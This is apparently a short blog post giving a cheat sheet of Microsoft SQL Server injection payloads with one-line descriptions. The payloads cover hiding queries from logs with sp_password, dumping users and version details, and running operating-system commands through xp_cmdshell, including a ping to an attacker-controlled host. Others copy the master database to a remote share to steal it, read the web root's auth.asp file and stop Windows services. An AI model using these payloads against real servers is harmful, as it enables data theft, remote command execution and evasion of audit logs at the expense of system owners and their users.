MSSQL Injection Commands and Output

» Microsoft SQL

Payload Description (if any)
‘admin –sp_password sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.
select @@version View database version.
select @@servername Misc. information disclosure
select @@microsoftversion Misc. information disclosure
select * from master..sysservers Misc. information disclosure
select * from sysusers View database usernames and passwords.
exec master..xp_cmdshell ‘ipconfig+/all’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+view’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+users’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks=’\\{IP}\{sharename}\backupdb.dat’ Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))” bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’” select * from myfile”– Reading files on the filesystem.
xp_servicecontrol (START or STOP) Start and stop Windows Services.
str1 + str2 OR n+n Concat strings for blind SQL Injection tests.

About these ads

About noneil
Rapper turned Rockstar!

One Response to MSSQL Injection Commands and Output

  1. Pingback: MSSQL Injection Commands and Output | Revolusionline

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: